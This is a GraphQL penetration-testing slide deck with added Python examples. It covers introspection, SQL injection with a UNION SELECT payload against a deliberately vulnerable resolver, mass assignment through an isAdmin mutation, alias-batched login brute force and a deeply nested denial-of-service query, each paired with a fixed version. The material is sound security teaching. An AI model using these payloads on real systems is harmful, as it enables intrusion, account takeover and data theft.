Pentest Application With GraphQL
Presented By:
Divyanshu Shukla
(@justm0rph3u5)
Agenda
• What is GraphQL
• REST vs GraphQL
• Example for REST/GraphQL
• Architecture
• Basics
• Pentesting GraphQL
What Is GraphQL?
• A query language for APIs, plus a server-side runtime that executes those queries, created and open-sourced by Facebook.
• GraphQL is a query language for APIs, not for databases.
• It is database agnostic and can sit in front of any data source, so it can be used in any context where an API is used.
• GraphQL enables declarative data fetching: the client states exactly which fields it wants, in a single request.
• GraphQL is used in production by multiple companies such as GitHub, Twitter, Coursera, etc.
REST vs GraphQL?
• REST needs multiple round trips to fetch related resources; GraphQL fetches the whole nested graph in one query.
• REST endpoints over-fetch or under-fetch; a GraphQL client asks for exactly the fields it needs.
• Rapid product iterations on the frontend without waiting for new backend endpoints.
• Benefits of a schema and type system: the API is self-describing, which is also what an attacker reads through introspection.
REST vs GraphQL Example: REST example and GraphQL example (shown as screenshots in the slides)
Architecture
Ref: https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e
Basics Terminology
• Schema Definition Language
• Object Types & Fields
• Arguments
• Aliases
• Fragments
• Variables
• Directives
• Types of Requests:
o Query
o Mutations
o Subscriptions
Pentesting GraphQL
• Tools
• Enumeration
• Introspection
• Injection (SQL/NoSQL)
• Information Disclosure
• Broken Access Control
• Authorization Bypass
• Brute Force/Denial Of Service
Tools
• Altair GraphQL Client / GraphiQL IDE (craft and replay queries, browse the Docs panel).
• GraphQL Raider (Burp Suite extension).
• GraphQL_Introspection.py (Python script by Doyensec).
• GraphQL Voyager (https://apis.guru/graphql-voyager/) to render an introspected schema as a graph.
GraphQL Tip
• Pentesting an app that uses GraphQL? POST is more common, but remember that many servers accept GET too. URL-encode the query and hit /graphql?query=. E.g., a schema request as GET:
https://example.com/graphql?query={__schema%20{%0atypes%20{%0aname%0akind%0adescription%0afields%20{%0aname%0a}%0a}%0a}%0a}
• Caveat: a GET endpoint is reachable from any other origin through a plain link or an <img>/<script> tag. If the server also executes mutations over GET, or over POST without a CSRF check, the same trick becomes a CSRF vector; note it as a finding.
Thanks to https://twitter.com/coffeetocode
Enumeration
• Watch the traffic the client sends to the server to find the GraphQL endpoint; common paths:
o /graphql/
o /graphql/console/
o /graphql.php
o /graphiql/
o /graphiql.php
• Send a deliberately malformed query (e.g. query={}) to a candidate endpoint. An error such as "Syntax Error: Expected Name, found }" is the GraphQL parser talking and confirms the endpoint.
• GraphQL endpoints may ship a GUI (GraphiQL, a playground); if present, its Docs panel exposes the schema directly.
Introspection
• GraphQL lets a client query metadata about the schema itself (types, fields, arguments, descriptions) via an introspection query.
• It is similar to the information_schema tables in a database.
• It tells an attacker which queries and mutations exist and which arguments they take, without any guessing.
• GraphQL Introspection Query: https://gist.github.com/a7v8x/c30d92d2ca2458035aadc41702da367d
• Developers can disable introspection in production, but the majority of applications leave it open. Disabling it is a hardening step, not a security boundary: field names can still be guessed or recovered from the client-side JavaScript that builds the queries.
• Hands-On: HackerOne
Ref: https://graphqlmastery.com/blog/graphql-introspection-and-introspection-queries
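The three steps above (GET form of a query, fingerprinting the endpoint from its parser error, and turning an introspection reply into a list of attack surface) as one added example. This is not code from the slides; the target path /graphql is assumed and the introspection response below is constructed by hand in the shape a real server returns.

```python
"""Added example: GraphQL endpoint fingerprinting and introspection triage.
Hypothetical target path /graphql; SAMPLE_RESPONSE is constructed, not captured."""
import json
from urllib.parse import quote

# The same introspection document the GET tip sends, kept readable here.
INTROSPECTION_QUERY = """
{ __schema {
    queryType { name }
    mutationType { name }
    types { name kind description
            fields { name args { name type { name kind ofType { name } } } } } } }
"""


def introspection_get_url(base_url, query=INTROSPECTION_QUERY):
    """Build the GET form of a query (/graphql?query=...). Anything served
    this way is also reachable from a cross-site link or <img> tag."""
    return f"{base_url.rstrip('/')}/graphql?query={quote(query, safe='')}"


def looks_like_graphql(body):
    """Fingerprint from the response to `query={}`: graphql-js and its ports
    reject an empty selection set with 'Syntax Error: Expected Name, found }'
    inside an `errors` array."""
    try:
        errors = json.loads(body).get("errors", [])
    except (ValueError, AttributeError):
        return False
    return any("Expected Name" in e.get("message", "") for e in errors)


def _type_name(t):
    # Unwrap NON_NULL / LIST wrappers down to the named type.
    while t and t.get("name") is None and t.get("ofType"):
        t = t["ofType"]
    return (t or {}).get("name", "?")


def summarize_schema(introspection):
    """Return 'Type.field(arg: T, ...)' for every user-defined object type,
    skipping the built-in __ types. Mutation fields are the first targets."""
    schema = introspection["data"]["__schema"]
    out = []
    for t in schema["types"]:
        if t["name"].startswith("__") or t["kind"] != "OBJECT":
            continue
        for f in t.get("fields") or []:
            args = ", ".join(f"{a['name']}: {_type_name(a['type'])}" for a in f.get("args", []))
            out.append(f"{t['name']}.{f['name']}({args})")
    return out


# Constructed sample reply (hypothetical schema with a self-service createPerson).
SAMPLE_RESPONSE = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "description": None, "fields": [
            {"name": "user", "args": [{"name": "id", "type": {"name": None, "kind": "NON_NULL", "ofType": {"name": "ID"}}}]},
            {"name": "users", "args": []}]},
        {"name": "Mutation", "kind": "OBJECT", "description": None, "fields": [
            {"name": "createPerson", "args": [
                {"name": "username", "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
                {"name": "password", "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
                {"name": "isAdmin", "type": {"name": "Boolean", "kind": "SCALAR", "ofType": None}}]}]},
        {"name": "__Schema", "kind": "OBJECT", "description": None, "fields": []},
        {"name": "String", "kind": "SCALAR", "description": None, "fields": None},
    ]}}}

if __name__ == "__main__":
    print(introspection_get_url("https://example.com"))
    for line in summarize_schema(SAMPLE_RESPONSE):
        print(line)
```

Run the summary against a real reply saved from Burp and grep the mutation lines: an argument like isAdmin on a mutation any user can call is exactly the lead the Authorization Bypass section follows up on.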
Injection
• Most applications sit in front of a database, so any resolver that builds a query from a field argument is a candidate for SQL injection, NoSQL injection and other injections. GraphQL validates argument types, not content: a String argument can carry any payload.
• Detect SQL injection with the usual quote, boolean and time-based probes, then exploit it, e.g. with UNION SELECT.
• sqlmap works too: save the POST request from Burp and pass it with -r, marking the injectable JSON value with *.
• Because every field argument is a separate input, there is a high chance that an application has multiple parameters vulnerable to SQL injection.
• Example: https://blog.usejournal.com/time-based-blind-sql-injection-in-graphql-39a25a1dfb3c
• Hands On: https://pentesterlab.com/exercises/graphql_ii/course
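An added example of the injection described above, not from the slides or from PentesterLab: a hypothetical resolver behind `query { user(username: "...") { id username } }` that concatenates its argument into SQL, beside the parameterised fix, with the boolean probe and the UNION SELECT payload run against a constructed in-memory SQLite table.

```python
"""Added example: SQL injection through a GraphQL field argument.
The `user` field, its resolver and the users table are hypothetical."""
import sqlite3


def setup_db():
    """Constructed sample data: two users, one of them an admin."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT, isAdmin INTEGER)")
    con.executemany("INSERT INTO users VALUES(?,?,?,?)",
                    [(1, "alice", "s3cret-hash", 1), (2, "bob", "hunter2-hash", 0)])
    return con


# Vulnerable: the GraphQL argument `username` is pasted into the SQL text.
# GraphQL only checked that it is a String; the content is attacker-controlled.
def resolve_user_vulnerable(con, username):
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return con.execute(sql).fetchall()


# Fixed: bind the argument; the driver never lets it change the query shape.
def resolve_user_fixed(con, username):
    return con.execute("SELECT id, username FROM users WHERE username = ?",
                       (username,)).fetchall()


def detect_sqli(resolver, con):
    """Boolean-based probe: a true tautology that returns more rows than a
    false one is the differential to look for before trying UNION."""
    true_rows = resolver(con, "x' OR '1'='1")
    false_rows = resolver(con, "x' OR '1'='2")
    return len(true_rows) > len(false_rows)


# UNION SELECT: column count must match the original SELECT (two columns here);
# the trailing -- comments out the closing quote the resolver appends.
UNION_PAYLOAD = "x' UNION SELECT username, password FROM users--"

if __name__ == "__main__":
    con = setup_db()
    print("vulnerable resolver injectable:", detect_sqli(resolve_user_vulnerable, con))
    print("fixed resolver injectable:", detect_sqli(resolve_user_fixed, con))
    print("dumped via UNION:", resolve_user_vulnerable(con, UNION_PAYLOAD))
```

Against a real target the payload goes in the JSON variables or inline in the query string; either way the server's JSON decoding happens before the resolver sees it, so quotes survive unchanged.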
Information Disclosure
• GraphQL is only a thin layer between client apps and the database, so its error messages often reveal what sits behind it.
• Try url/graphql.php?debug=1 to find a debug mode with additional error reporting (stack traces, resolver names, raw SQL).
• Insert a single quote or double quote into arguments to provoke errors from the server and from the GraphQL layer.
• Iterate over id values in user queries (IDOR). Unless object-level authorization is enforced in every resolver, you will be able to read other users' data.
Broken Access Control
• Broken access control can expose the admin account's identifiers (id, email, isAdmin flag); an attacker then has a target for brute-forcing login credentials and gaining admin-level access.
• Steps to reproduce: query the users field as a low-privilege user and check whether other users' profile details (id, email, role flags) come back.
• Vulnerable GraphQL query:
query {
  users {
    id
    email
    isAdmin
    isActive
  }
}
Authorization Bypass
• Suppose we can create users:
mutation {
  createPerson(username: "User1", password: "user1") { id }
}
• If the handler on the server also accepts an isAdmin argument (check the mutation's arguments in the introspection output), send a request of the form:
mutation {
  createPerson(username: "User1", password: "user1", isAdmin: true) { id }
}
• This makes User1 an administrator: the server took a privilege decision from client input (mass assignment). GraphQL boolean literals are lowercase true/false, and a selection set must name at least one field, hence the { id }.
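An added example covering both the Broken Access Control and the Authorization Bypass slides, not code from the slides: the `users` query and the `createPerson` mutation modelled as hypothetical Python resolvers, each in its vulnerable and its fixed form. The in-memory store, the Person and Viewer types and all sample data are constructed here. In real GraphQL the validator rejects arguments the schema does not declare, so the bypass works when the schema itself exposes isAdmin on a self-service mutation or the resolver forwards a whole input object to the model; the fixed resolver fails closed on anything outside an allow-list and never derives a privilege from client input.

```python
"""Added example: object/field-level authorization and mass assignment in
GraphQL resolvers. Store, Person, Viewer and data are hypothetical."""
from dataclasses import dataclass


@dataclass
class Person:
    id: int
    username: str
    email: str
    isAdmin: bool = False
    isActive: bool = True


@dataclass
class Viewer:
    """The caller, resolved from the session or token, never from arguments."""
    id: int
    isAdmin: bool


class Store:
    def __init__(self):
        self.people = {1: Person(1, "admin", "admin@example.com", isAdmin=True),
                       2: Person(2, "bob", "bob@example.com")}
        self.next_id = 3


# Broken access control: `query { users { id email isAdmin isActive } }`
def resolve_users_vulnerable(store, viewer):
    # Nobody asks who the viewer is: every caller gets every user, every field.
    return [vars(p) for p in store.people.values()]


def resolve_users_fixed(store, viewer):
    # Object-level: non-admins only see themselves.
    rows = list(store.people.values()) if viewer.isAdmin else [store.people[viewer.id]]
    out = []
    for p in rows:
        row = {"id": p.id, "username": p.username, "isActive": p.isActive}
        if viewer.isAdmin:          # field-level: email and isAdmin are admin-only
            row["email"] = p.email
            row["isAdmin"] = p.isAdmin
        out.append(row)
    return out


# Authorization bypass: `mutation { createPerson(username, password, isAdmin: true) { id } }`
def create_person_vulnerable(store, args):
    # Mass assignment: whatever the schema lets through is copied onto the
    # model, so isAdmin: true on a self-service mutation grants admin.
    p = Person(id=store.next_id, username=args["username"],
               email=args.get("email", ""), isAdmin=args.get("isAdmin", False))
    store.people[p.id] = p
    store.next_id += 1
    return p


CREATE_PERSON_ARGS = {"username", "password", "email"}


def create_person_fixed(store, args):
    # Fail closed on anything outside the allow-list; promotion to admin is
    # a separate, admin-only mutation, never an argument here.
    unexpected = set(args) - CREATE_PERSON_ARGS
    if unexpected:
        raise ValueError(f"unexpected argument(s): {sorted(unexpected)}")
    p = Person(id=store.next_id, username=args["username"], email=args.get("email", ""))
    store.people[p.id] = p
    store.next_id += 1
    return p


if __name__ == "__main__":
    store = Store()
    bob = Viewer(id=2, isAdmin=False)
    print(resolve_users_vulnerable(store, bob))   # leaks the admin's email and flag
    print(resolve_users_fixed(store, bob))        # only bob, without email/isAdmin
    evil = {"username": "User1", "password": "user1", "isAdmin": True}
    print(create_person_vulnerable(store, evil).isAdmin)
```

When testing, run the users query twice, once as a low-privilege account and once unauthenticated, and diff the field sets; the fix is only complete when both the row filter and the per-field filter hold.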
Brute Force/Denial Of Service
• Brute-force email, id and similar arguments.
• Brute-force mutations such as login. Aliases let one HTTP request carry many copies of the same mutation, so rate limiting that counts requests instead of operations is bypassed.
• Where rate limiting is absent, a low-privilege or non-admin user can brute-force login credentials and view details they should not see.
• Deeply nested queries can cause denial of service: every level multiplies the resolver calls and database queries behind it.
query {
  stories {
    title
    body
    comments {
      comment
      author {
        comments {
          author {
            comments {
              comment
              author {
                comments {
                  comment
                  author {
                    comments {
                      comment
                      author { name }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}
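Two checks behind the brute-force and nesting points above, as an added example that is not from the slides: building an alias-batched login mutation (many password guesses in one request, which is why a per-request limiter does not help) and a small depth counter of the kind a server uses to reject the nested stories query before executing it. The `login` mutation and its `token` field are hypothetical; DEEP_QUERY is the query from the slide.

```python
"""Added example: alias batching for brute force, and a selection-depth
check as the server-side defence. `login`/`token` are hypothetical."""
import json

# The nested query from the slide, on one line (12 nested selection sets).
DEEP_QUERY = ("query { stories { title body comments { comment author { comments { author "
              "{ comments { comment author { comments { comment author { comments { comment "
              "author { name } } } } } } } } } } } }")


def batched_login(username, passwords):
    """One document, N aliased calls of the same mutation: a limiter that
    counts HTTP requests sees one request for N password guesses."""
    calls = [f"a{i}: login(username: {json.dumps(username)}, "
             f"password: {json.dumps(pw)}) {{ token }}"
             for i, pw in enumerate(passwords)]
    return "mutation {\n  " + "\n  ".join(calls) + "\n}"


def count_operations(document, field):
    """Server-side counterpart: charge the limiter per aliased call of a
    sensitive field, not per request."""
    return document.count(field + "(")


def selection_depth(document):
    """Maximum nesting of selection sets. Braces inside string literals and
    # comments are ignored so a payload cannot hide or fake nesting."""
    depth = deepest = 0
    i, n = 0, len(document)
    while i < n:
        c = document[i]
        if c == "#":                                  # comment to end of line
            while i < n and document[i] != "\n":
                i += 1
        elif c == '"':                                # string literal, with escapes
            i += 1
            while i < n and document[i] != '"':
                i += 2 if document[i] == "\\" else 1
        elif c == "{":
            depth += 1
            deepest = max(deepest, depth)
        elif c == "}":
            depth -= 1
        i += 1
    return deepest


def within_limits(document, max_depth=6, max_ops=5, field="login"):
    """Reject before execution: too deep, or too many login attempts."""
    return (selection_depth(document) <= max_depth
            and count_operations(document, field) <= max_ops)


if __name__ == "__main__":
    doc = batched_login("admin", ["admin", "password", "Summer2019!"])
    print(doc)
    print("depth of batched login:", selection_depth(doc))   # shallow: depth caps alone do not stop it
    print("depth of DEEP_QUERY:", selection_depth(DEEP_QUERY))
    print("DEEP_QUERY within limits:", within_limits(DEEP_QUERY))
```

Note that the batched login document has depth 2, so a depth limit on its own says nothing about brute force; a complete defence needs both a depth (or cost) cap and per-operation rate limiting on sensitive mutations.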
Reference
• https://github.com/graphql/graphiql
• https://www.slideshare.net/NeeluTripathy2/pentesting-graphql-applications
• https://prog.world/pentest-applications-with-graphql/
• https://www.howtographql.com
• https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e
• https://blog.doyensec.com/2018/05/17/graphql-security-overview.html
• https://voidsec.com/graphql-security-overview-and-testing-tips/
• https://ctf.hacker101.com
• https://pentesterlab.com/exercises/graphql_ii/course
Pentest Application With GraphQL | Null Bangalore Meetup
